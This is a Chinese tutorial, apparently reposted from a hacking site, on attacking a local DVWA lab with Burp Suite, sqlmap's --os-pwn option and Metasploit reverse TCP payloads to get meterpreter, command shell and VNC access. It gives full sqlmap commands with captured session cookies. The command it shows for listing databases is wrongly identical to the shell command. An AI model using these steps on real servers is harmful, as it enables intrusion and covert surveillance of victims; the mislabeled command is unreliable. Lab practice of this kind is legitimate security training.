需求:
Xampp / Wamp服务器
DVWA实验室
Kali Linux:Burpsuite,sqlmap工具
首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名 - admin
密码 - 密码
单击 DVWA Security 并将网站安全级别设置为 低
从漏洞列表中选择SQL Injection以进行攻击。 在文本框中键入 用户ID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
打开burp套件点击菜单栏中的代理 , 然后 按下按钮。回来并点击 dvwa中的提交按钮。Burp将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
让我们使用sqlmap命令下的“referrer和cookies”枚举所有数据库名称。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
它已经转储了所有数据库的名称。现在我将选择dvwa来访问其后端数据库管理系统。
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
现在输入以下命令来访问Web服务器的shell并按照屏幕截图显示。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
类型1为Metasploit的框架建立然后反向连接键入4 为 PHP的 有效载荷支持服务器和再次 键入1为 共同的位置对于可写目录 上传有效载荷(payload )作为受害者PC后门。
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
这里类型1用于reverse tcp连接作为默认选项。现在我将逐个选择这三个有效负载并尝试每次都破解Web服务器。现在输入1作为meterpreter。
它将加载metasploit框架并提供meterpreter会话1。
重复整个过程,直到反向tcp连接进一步要求选择有效负载,然后输入2作为shell。
它将再次加载metasploit框架并提供命令shell会话1。
重复整个过程直到反向tcp连接(everse tcp connection),当它进一步要求选择有效载荷时,这次现在为VNC 键入3 。
它将再次加载metasploit框架和launchVNC查看器。
在这里,您可以从给定的屏幕截图中看到我通过tightVNC访问受害者pc,现在受害者每一刻都将被保留在我的观察之下。因此我们用各种类型的shell攻击受害者pc三次。
描述:利用Sqlmap和Metaasp来渗透测试网站服务器
本文标题:渗透工具实战:利用Sqlmap和Metaasp来渗透测试网站服务器(OS-Pwn)
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2335.html
